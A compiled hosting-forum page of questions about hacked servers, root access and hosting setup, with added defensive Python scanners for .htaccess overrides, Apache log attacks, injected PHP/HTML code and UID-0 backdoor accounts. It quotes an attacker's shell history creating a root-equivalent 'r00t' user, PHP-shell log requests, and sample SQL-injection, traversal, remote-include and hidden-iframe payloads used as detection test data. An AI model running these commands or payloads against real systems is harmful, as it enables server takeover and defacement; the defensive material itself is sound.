
Unfortunately this guy simply doesn't stop...he seems to have a reverse DNS list or something. He is only attacking accounts on one specific server of mine but I am pretty sure he doesn't have root access.

Hacker :: Pages Showing Errors
It seems like someone has hacked into my server, and all of the pages for one of my domains are showing errors.

Each page on my site is showing a PHP inclusion error: each file on my site is trying to include an unknown file, /tmp/blah.php for example, which doesn't exist on my site, therefore creating errors and not showing my site.

I checked my site in ftp, it isn't in the code. So it is definitely in a server file somewhere.

What could be doing this? It's for a single domain only. I've created the file it is trying to include as a temporary fix, and I have checked php.ini and there seems to be no reference to the included file there.

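The .htaccess PHP-version switch described in "Php Version Vs Hacker" and the phantom /tmp/blah.php include in this post are the same class of problem: a per-directory override file that a tenant (or someone holding a tenant's credentials) drops into a web root. Below is an added example, my own code and not from either poster, that scans a document root for .htaccess, .user.ini and php.ini files and flags the directives that do this: handler/type remaps pointing at PHP, and php_value or ini settings such as auto_prepend_file and auto_append_file. The files in SAMPLE_FILES are constructed for the example; the paths and contents are assumptions, not anything taken from the posts.

```python
import os
import re

# Per-directory files a tenant can drop into a web root to override Apache/PHP behaviour.
OVERRIDE_FILENAMES = {".htaccess", ".user.ini", "php.ini"}

# Apache directives that re-map which interpreter handles a file. Any of these naming a
# PHP handler in a user-writable .htaccess is the "switch PHP version" trick.
HANDLER_RE = re.compile(
    r"^\s*(AddHandler|AddType|SetHandler|Action|AddInputFilter|AddOutputFilter)\s+.*php",
    re.IGNORECASE,
)
# ini keys a tenant should never be able to set. auto_prepend_file is how "every page
# suddenly includes /tmp/blah.php" is usually done.
DANGEROUS_INI_KEYS = (
    "auto_prepend_file", "auto_append_file", "include_path", "open_basedir",
    "disable_functions", "safe_mode", "allow_url_include",
)
# php_value / php_flag / php_admin_value form used inside .htaccess (mod_php only).
PHP_VALUE_RE = re.compile(r"^\s*php_(?:admin_)?(?:value|flag)\s+(\w+)\s+(.*)$", re.IGNORECASE)
# key = value form used in php.ini and .user.ini.
INI_KEY_RE = re.compile(r"^\s*(\w+)\s*=\s*(.*?)\s*$")


def scan_text(text, path):
    """Return (path, line_no, reason) for every suspicious directive in one file's contents."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith(("#", ";")):
            continue  # comment or blank line in either Apache or ini syntax
        if HANDLER_RE.match(line):
            findings.append((path, no, "php handler remapped: " + stripped))
            continue
        m = PHP_VALUE_RE.match(line)
        if m and m.group(1).lower() in DANGEROUS_INI_KEYS:
            findings.append((path, no, "php_value override: " + stripped))
            continue
        m = INI_KEY_RE.match(line)
        if m and m.group(1).lower() in DANGEROUS_INI_KEYS:
            value = m.group(2).strip("\"'")
            if value and value.lower() != "none":  # an empty value just clears the setting
                findings.append((path, no, "ini override: " + stripped))
    return findings


def scan_tree(root):
    """Walk a document root and scan every per-directory override file found under it."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name in OVERRIDE_FILENAMES:
                full = os.path.join(dirpath, name)
                try:
                    with open(full, encoding="utf-8", errors="replace") as fh:
                        findings.extend(scan_text(fh.read(), full))
                except OSError:
                    pass  # unreadable file: report separately if you care
    return findings


# Constructed sample files standing in for a real vhost tree (paths are assumptions).
SAMPLE_FILES = {
    "/var/www/vhosts/site1/httpdocs/.htaccess": (
        "# switch this directory to the other PHP build\n"
        "AddHandler application/x-httpd-php4 .php\n"
        "php_value auto_prepend_file /tmp/blah.php\n"
    ),
    "/var/www/vhosts/site2/httpdocs/.htaccess": (
        "Options -Indexes\n"
        "RewriteEngine On\n"
        "RewriteRule ^old$ /new [R=301,L]\n"
    ),
    "/var/www/vhosts/site3/httpdocs/.user.ini": (
        "; looks harmless\n"
        "auto_append_file = \"/tmp/.x/inc.php\"\n"
        "memory_limit = 64M\n"
    ),
}


def scan_samples():
    """Run the scanner over the constructed samples (same logic scan_tree applies to disk)."""
    findings = []
    for path, text in SAMPLE_FILES.items():
        findings.extend(scan_text(text, path))
    return findings


if __name__ == "__main__":
    for path, no, reason in scan_samples():
        print(f"{path}:{no}: {reason}")
```

Handler remaps in .htaccess only take effect where httpd.conf grants `AllowOverride FileInfo` (or `All`) for that directory, and `php_value` lines need `AllowOverride Options` plus mod_php; under CGI/FastCGI setups (suPHP, php-fpm) PHP does not read `php_value` at all but honours a per-directory php.ini or, from PHP 5.3, `.user.ini`, which is why the scan reads all three file names. Tightening `AllowOverride` for tenant directories is what stops the version switch; for the stray include, also look at a phpinfo() page served from the affected vhost, since auto_prepend_file can equally be set in the global php.ini or a `php_admin_value` in the vhost definition rather than in a file under the web root.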
Hacker Attack On <my Reseller Accounts>
I have two reseller accounts with Innohosting and a hacker has got into several sites on both accounts. I have contacted Innohosting and hopefully will get an explanation soon.

But as this is very serious, I want to put it out on this forum also.

At first I thought they must have cracked my FTP access, but they have got into several sites on both reseller accounts so they must have gained access to the server itself, I suspect.

How do I stop these lowlifes striking?

Hacker Trying To Login SQL Server
My server is generating a lot of these log entries, and the SQL process is taking too much RAM on my server.

How can I block an IP address?

Log Description:
Login failed for user 'sa'. [CLIENT: 199.227.13.134]

For more information, see Help and Support Center at [url]

Mod_security- Hacker Still Upload File..
I just had someone uploading files via PHP on a website. I need a way to block that kind of attack via mod_security.

Can I add something in mod_security to avoid this?

89.146.147.144 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:23 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/&newdir=bh HTTP/1.1" 200 154634 [url]x=************.***??" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:32 -0600] "GET /XXXX/index.php?x=************.***?&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/ HTTP/1.1" 200 7444 [url] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
89.146.147.144 - - [17/Jan/2007:12:24:41 -0600] "GET /XXXX/index.php?x=************.***?&action=mkdir&chdir=/var/www/vhosts/XXXX.net/httpdocs/XXXX/bh/&newdir=************.*** HTTP/1.1" 200 8422 [url] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"

Hacked Vps, To Many Files, How To Detect Hacker
Some time ago the DC told me there were too many files on the server. I started to investigate what it was and found out that someone had hacked the server and was sending spam from it.

When I looked at the accounts in DirectAdmin, some of them had the contact email set to some hacker's address, so I deleted the emails and changed the password on the DA account and the email of those accounts.

Still I get too many files all the time, so the server goes down and I have to delete the spool file all the time, like 10 times a day.

Please help: how do I detect from which account the hacker operates?

Can I detect that somehow?

Is it possible to do some small script to detect this?

Is there any advanced module for DA that gives me the info?

Hacker Detection On Apache Log Files
I have a client who is certain someone is trying to hack her web portal. I need to set up something that will alert me to suspicious activity on the server, for example someone fiddling with requests, trying SQL/shell injection and similar threats.

Does any tool (for example a bash script with grep) exist that would parse the raw Apache logs and report if something is suspicious? Apache logs don't show the POST data, so I am talking to the admin about setting up the dump_io Apache mod that enables this.

Or am I going in the wrong direction here and there is a whole other way to do this? I searched the web and forums for anything like this and didn't find anything.

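Three posts above ask essentially the same thing: the DFind probe in "Dealing With A Persistent Hacker", the PHP-shell requests in "Mod_security- Hacker Still Upload File..", and the request for a grep-style log checker here. The added example below is my own code, not something any of the posters wrote, and is the kind of first-pass detector a script with grep would grow into: it pulls the request target out of each access-log line, URL-decodes it, and matches it against a small set of signatures (scanner probes, SQL injection, traversal, remote file inclusion, command injection, and the mkdir/chdir/newdir parameters a browser-driven PHP shell sends), then counts hits per client address. SAMPLE_LOG is constructed; the addresses, paths and the single IIS-style line in it are invented, and treating the first dotted-quad in a line as the client address is an assumption that holds for Apache combined logs but must be checked against the field order of an IIS W3C log (which also puts the query string in a separate field, so join cs-uri-stem and cs-uri-query before matching).

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures matched against the URL-decoded request target (path + query string).
REQUEST_RULES = [
    ("DFind/w00tw00t probe", re.compile(r"w00tw00t", re.I)),
    ("sql injection", re.compile(
        r"union\s+(?:all\s+)?select|information_schema|'\s*(?:or|and)\s+[\w']+\s*=|"
        r"\bsleep\s*\(|benchmark\s*\(|load_file\s*\(", re.I)),
    ("path traversal", re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self/", re.I)),
    ("remote file inclusion", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
    ("command injection", re.compile(
        r"[;|`]\s*(?:cat|ls|id|wget|curl|uname|nc|perl|python|sh|bash)\b|\$\(", re.I)),
    # The parameters a web-based PHP shell uses to walk and write the filesystem.
    ("php shell control", re.compile(
        r"\b(?:chdir|newdir|cmd|exec)=|action=(?:mkdir|upload|exec|shell)", re.I)),
]
# Matched against the whole raw line, so tool names in the user-agent field count too.
LINE_RULES = [
    ("scanner tool signature", re.compile(r"nikto|sqlmap|nessus|masscan|zgrab|acunetix", re.I)),
]
# Finds the request in both Apache combined ("GET /x HTTP/1.1") and IIS W3C (... GET /x 400 ...) lines.
REQUEST_RE = re.compile(r"\b(GET|POST|HEAD|PUT|DELETE|OPTIONS)\s+(\S+)")
# Assumption: the first dotted-quad in the line is the client address.
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def classify_line(line):
    """Return the list of rule names triggered by one access-log line (empty if clean)."""
    hits = []
    m = REQUEST_RE.search(line)
    if m:
        target = unquote_plus(m.group(2))  # decode %27, %20, + so encoded payloads still match
        hits.extend(name for name, rx in REQUEST_RULES if rx.search(target))
    hits.extend(name for name, rx in LINE_RULES if rx.search(line))
    return hits


def scan_log(lines):
    """Return (client_ip, request_target, rules) for every suspicious line, in log order."""
    findings = []
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        rules = classify_line(line)
        if not rules:
            continue
        ip_m = IPV4_RE.search(line)
        req_m = REQUEST_RE.search(line)
        findings.append((ip_m.group(0) if ip_m else "?",
                         req_m.group(2) if req_m else "?", rules))
    return findings


def offenders(findings):
    """Count flagged requests per client IP, most active first."""
    return Counter(ip for ip, _req, _rules in findings).most_common()


# Constructed sample log: six Apache combined lines and one IIS-style line (all invented).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jan/2007:12:24:11 -0600] "GET /favicon.ico HTTP/1.1" 404 1002 "-" "Mozilla/5.0"
10.0.0.5 - - [17/Jan/2007:12:24:23 -0600] "GET /site/index.php?x=shell.txt?&action=mkdir&chdir=/var/www/vhosts/site/httpdocs/&newdir=bh HTTP/1.1" 200 154634 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jan/2007:12:30:01 -0600] "GET /products.php?id=1%27%20UNION%20SELECT%20user%2Cpassword%20FROM%20users-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jan/2007:12:30:07 -0600] "GET /index.php?page=http://evil.example/c.txt? HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Jan/2007:12:30:12 -0600] "GET /cgi-bin/view.cgi?file=../../../../etc/passwd HTTP/1.1" 403 0 "-" "Mozilla/5.0"
10.0.0.7 - - [17/Jan/2007:12:31:00 -0600] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
2007-05-19 08:21:10 203.0.113.8 2243 192.0.2.10 80 HTTP/1.1 GET /w00tw00t.at.ISC.SANS.DFind 400 - Hostname -
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for ip, req, rules in found:
        print(f"{ip} {', '.join(rules)}: {req}")
    print("per-IP totals:", offenders(found))
```

Run it against a whole access_log from cron and mail the output, and you have the alerting the client asked for; the patterns are deliberately narrow so they can be extended as the real traffic shows what it contains. Two caveats the poster already spotted: POST bodies are not in the access log, so injection carried in form fields needs either the dumpio module mentioned or a web application firewall such as mod_security in front of the application; and a 200 status on a shell request (as in the mkdir lines quoted above) means the alert came after the damage, so the same signatures belong in a request-blocking rule, not only in a log scan.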
Hacker Adds Malicious Code To All Html And Php Files
We have been having a strange hacking problem on our server, and we cannot seem to find out how they are managing to accomplish it. I am just wondering if anyone here may be able to offer any suggestions on this.

The problem:

On our server, a hacker has managed to add malicious code to all HTML and PHP files on two hosting accounts that we operate. These two accounts are separate and do not share login information. This is the second time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful; however, at the moment they cannot seem to pinpoint the problem. There also does not appear to be any indication in the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerability?

[url]

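When every .html and .php file on an account is modified and the access log shows nothing, the two questions to answer are which files changed and when, and what was put in them. The added example below is my own code, not from the poster or their host, and covers both: it builds a SHA-256 manifest of the web files (the baseline you take when the site is known clean), diffs a later snapshot against it, and scans file contents for the signatures this kind of mass injection typically carries (eval() of a base64/gzinflate payload in PHP, preg_replace with the /e modifier, obfuscated document.write/eval(unescape(...)) in HTML, and hidden iframes). BEFORE and AFTER are constructed in-memory trees standing in for two snapshots; their paths, the evil.example host and the base64 strings are invented placeholders.

```python
import hashlib
import json
import os
import re

# Content signatures for code that gets injected into every page of a compromised site.
INJECTION_RULES = [
    ("php eval of encoded payload",
     re.compile(rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("php preg_replace with /e modifier",
     re.compile(rb"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
    ("obfuscated javascript",
     re.compile(rb"(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(", re.I)),
    ("hidden iframe",
     re.compile(rb"<iframe[^>]*(?:width\s*=\s*['\"]?0\b|height\s*=\s*['\"]?0\b|"
                rb"visibility\s*:\s*hidden|display\s*:\s*none)", re.I)),
]
WEB_EXTENSIONS = (".php", ".phtml", ".html", ".htm", ".js")


def file_digest(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(files):
    """files: {relative_path: bytes} -> {relative_path: sha256 hex}."""
    return {path: file_digest(data) for path, data in files.items()}


def read_tree(root):
    """Read every web file under root into {relative_path: bytes} (for use on a real docroot)."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(WEB_EXTENSIONS):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return files


def save_manifest(manifest, path):
    """Write the baseline somewhere the web server user cannot modify it."""
    with open(path, "w") as fh:
        json.dump(manifest, fh, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as fh:
        return json.load(fh)


def compare_manifests(baseline, current):
    """Sorted lists of paths added, removed or modified since the baseline."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
    }


def scan_injections(files):
    """Return (path, rule_name) for every file whose contents match an injection signature."""
    hits = []
    for path, data in files.items():
        for name, rx in INJECTION_RULES:
            if rx.search(data):
                hits.append((path, name))
    return hits


# Constructed snapshots of a small site, before and after a mass injection (all invented).
BEFORE = {
    "httpdocs/index.php": b"<?php include 'header.php'; echo 'Hello'; ?>\n",
    "httpdocs/index.html": b"<html><body><h1>Welcome</h1>\n</body></html>\n",
    "httpdocs/about.html": b"<html><body><p>About us</p></body></html>\n",
}
AFTER = {
    "httpdocs/index.php": b"<?php eval(base64_decode('c3RyaW5n')); ?>\n"
                          b"<?php include 'header.php'; echo 'Hello'; ?>\n",
    "httpdocs/index.html": b"<html><body><h1>Welcome</h1>\n"
                           b"<iframe src=\"http://evil.example/x.php\" width=0 height=0 "
                           b"style=\"visibility:hidden\"></iframe>\n</body></html>\n",
    "httpdocs/about.html": b"<html><body><p>About us</p></body></html>\n",
    "httpdocs/images/.cache.php": b"<?php eval(gzinflate(base64_decode('c3RyaW5n'))); ?>\n",
}

if __name__ == "__main__":
    diff = compare_manifests(build_manifest(BEFORE), build_manifest(AFTER))
    print("changed since baseline:", diff)
    for path, rule in scan_injections(AFTER):
        print(f"{path}: {rule}")
```

On a real server you would call `read_tree("/home/account/public_html")` once while the site is clean, `save_manifest()` the result outside the account's reach, and re-run the comparison from cron; the modification times of the files it lists (`stat`, not the web log) are what narrow down the entry point, since a change that never appears in the access log came in through another door: FTP, a control-panel file manager, a cron job, or another account on the same box. The content scan is a second opinion for the case where there is no baseline yet.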
Hacker Safe, TRUSTe, BBB And Trust Guard Seals
I am starting an online store. Someone told me to use third-party seals for a good response.

Please recommend me which seals to be used
Hacker Safe, TRUSTe, BBB, and Trust Guard

I think the Trust Guard seal gives a multi-package covering security, privacy and business verification. Do people know it? Is it worth the money?

Any Info On Blocking The "Turkish Hacker"
One of my clients has a shared hosting account with a major hosting company. Their site was recently hacked by the "Turkish Hacker."

A quick web search indicates that this is a well known attacker, going back several years. (Of course, it could just be a copycat.)

The hosting company provided no help in identifying how the site was hacked, or how to prevent it in the future, other than saying "change your passwords."

Is there any information available on how this particular hacker penetrates a site? Are there precautions the hosting company should have taken and did not? Are there things the client can do, other than using secure passwords and changing them regularly?

"JaMaYcKa" Hacker Strikes On My Server
All index.php and index.html files on my server have been replaced with the "JaMaYcKa" hackers page. I was reading on WHT, and just about 10 days ago this happened to another member here.

I am using seeksadmin for system administration, and coincidentally the guy who was hacked 10 days ago was also using seeksadmin. I believe there was another member here a month ago who was also hacked by "JaMaYcKa", and he was also a seeksadmin customer. I am not blaming seeksadmin in any way; they have helped a lot and I hope they can get this resolved.

Does anyone have any information on how to reverse/fix this issue? I am no system admin, just to put that out there, hence the reason I hired seeksadmin.

Here is the .bash_history from what the "JaMaYcKa" hacker did,

Quote:

cd /
pwd
/usr/sbin/useradd -o -u 0 -g 0 r00t -p ******************
passwd r00t
rm -rf tmp/
cd tmp
ls -a
unzip 1.zip
perl mass.pl /tmp/index.html
exit

According to the history, he ran some mass.pl script which would cause all index.php/html files to be changed (I am assuming). I have already removed the user "r00t" that he created, as seen above.

Any info on how to get this reversed? (And if anyone else was using seeksadmin, let me know if they resolved your issue.) I am currently waiting for an update from seeksadmin, so I'll update you guys once they reply to the ticket. Also to note, I am using WHMCS, which contained the root password to this server; another user mentioned in another thread that if you were using WHMCS/MB/CE/etc. a hacker could get your root password, which of course, if the password was not encrypted or the script had a glitch, the hacker could easily do.

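The first thing the quoted history does is `useradd -o -u 0 -g 0 r00t`: the `-o` flag lets useradd create a second account with UID 0, which is a full root login under another name and survives a root password change. Deleting the one account you happened to spot is not enough; the check is to audit /etc/passwd for every UID-0 entry, duplicate UIDs, and login-capable accounts parked in odd home directories. The added example below is my own code, not from the poster or seeksadmin, and runs that audit over constructed passwd text (SAMPLE_PASSWD is invented, including its r00t line) as well as over the real file.

```python
from collections import defaultdict

# Homes that no interactive account should have; world-writable or volatile locations.
SUSPICIOUS_HOMES = ("/tmp", "/var/tmp", "/dev/shm", "/dev")
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Parse /etc/passwd text into dicts; malformed lines are kept with an 'error' key."""
    entries = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"line": no, "raw": line, "error": "malformed entry"})
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({"line": no, "name": name, "uid": int(uid), "gid": int(gid),
                        "home": home, "shell": shell})
    return entries


def _under(path, prefixes):
    path = path.rstrip("/") or "/"
    return any(path == p or path.startswith(p + "/") for p in prefixes)


def audit_passwd(text):
    """Return (line_no, subject, reason) findings for a passwd file's contents."""
    findings = []
    by_uid = defaultdict(list)
    for e in parse_passwd(text):
        if "error" in e:
            findings.append((e["line"], e["raw"], e["error"]))
            continue
        by_uid[e["uid"]].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["line"], e["name"], "uid 0 account other than root"))
        if _under(e["home"], SUSPICIOUS_HOMES) and e["shell"] not in NOLOGIN_SHELLS:
            findings.append((e["line"], e["name"], "login shell with home under " + e["home"]))
    for uid, names in by_uid.items():
        if len(names) > 1:  # only possible via useradd -o or hand-editing the file
            findings.append((0, ",".join(names), f"duplicate uid {uid}"))
    return findings


def uid0_aliases(text):
    """Names of every UID-0 account other than root (the r00t pattern)."""
    return [e["name"] for e in parse_passwd(text)
            if "error" not in e and e["uid"] == 0 and e["name"] != "root"]


def audit_file(path="/etc/passwd"):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


# Constructed sample passwd (invented accounts; r00t mirrors the useradd line quoted above).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
admin:x:500:500::/home/admin:/bin/bash
r00t:x:0:0::/home/r00t:/bin/bash
ftpx:x:502:502::/tmp/.ftp:/bin/bash
"""

if __name__ == "__main__":
    for line_no, subject, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line_no}: {subject}: {reason}")
```

The one-liner equivalent for the first check is `awk -F: '$3 == 0' /etc/passwd`; anything it prints besides root is a backdoor. Also compare /etc/shadow for the same names, since a UID-0 entry can be added to passwd alone with a password hash in the second field, and look at authorized_keys under /root and every home directory, which the quoted history does not show but which the same attacker class commonly plants.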
Root Vs Su Root
What is the difference between working as root and su root in SSH?

Many recommend disabling logging in as root, but a lot of commands (service, adduser, ifconfig, ...) are not working on the command line when logged in as su. I feel like my hands are tied working as su root, and many commands are not available.

Why is it like that? Is there any way I can feel comfortable logging in as su, similar to a root login?

After Su To Root
I have a problem: after I su to root, I can't use some commands:

Quote:

Last login: Fri Jul 13 10:38:55 2007 from 10.10.0.1
[admin@server ~]$ su
Password:
[root@server admin]# runlevel
bash: runlevel: command not found
[root@server admin]# service httpd restart
bash: service: command not found
[root@server admin]# service apf restart
bash: service: command not found

But when I go to that machine and log in, I can use those commands just fine. That machine is about 20 feet away from my desk.

ROOT
I got into my root and I created a CS server, but after closing my root from my home the CS server goes down. Can you tell me how to fix this? I can't keep my root open for a lifetime. How much bandwidth does a full 20-man pub use in a month on average?

Root Domain
I have a server that I have a few domains on, and I have a question about the root domain. I initially picked any old domain, so now all of my name servers are pointing to this one random domain. I have since purchased a few more premium domains, and am wondering if I should change the nameservers to be the more premium domains? Does this matter? Should I have my "main site" be the root domain? Just trying to understand what the implications could be for me.

Slow System
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

Root Password
My computer's HDD crashed last night and I only have an old backup.

The problem is that my new server's root password was stored there, and it's a 20-digit, totally random password.

Is there any way to reset the server password by the dedicated server provider?

I haven't asked my provider yet.

Email From Root
Daily I am getting this kind of email from my VPS. I don't understand these emails; can someone explain what this is?

------------------------------------------
Time: Wed Apr 18 03:37:58 2007
IP: xx.xx.xxx.xx (livebot-65-55-212-73.search.live.com)
Connections: 198
Blocked: temporarily

Connections:
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:39478 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:38710 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:40501 TIME_WAIT
tcp 0 0 xx.xx.xxx.xxx:80 xx.xx.xxx.xx:40499 TIME_WAIT
..........
--------------------------------------------

FTP As Root
I just recently had someone from this forum install CentOS for me with ISPConfig and the required modules to successfully run PHPmotion. However, the only FTP accounts I can access are the ones I create in ISPConfig, such as web1_admin, web1_testuser, etc.

When installing a CentOS server with ISPConfig, isn't there a root account to log into the FTP?

With the FTP accounts that I have, I cannot access public and home directory such as /var/www directories.

Is there supposed to be an account for FTP so I can successfully oversee the whole server?

I want to take a look at all the websites I have such as /var/www/www.test1.com, /var/www/www.test2.com, etc. all through FTP. However, I cannot do this. It's almost like I have no Admin power over my server.

He did not provide me with a root FTP account or any super-admin FTP account. I am not sure if something suspicious is going on or not. Please help. I do not want to get hacked and have files stolen.

Invoicing System
Is there any billing software/script that enables customers to view their invoices without logging in?

KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO, which have worked only so-so since their deployment. The HP iLO has performed absolutely flawlessly, but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've come across the Raritan Dominion KX II, which looks pretty promising. Are there any other KVM over IP systems or manufacturers that I should look into? Has anyone used this, and can you comment on its reliability?

Copyright © 2005-08 www.BigResource.com, All rights reserved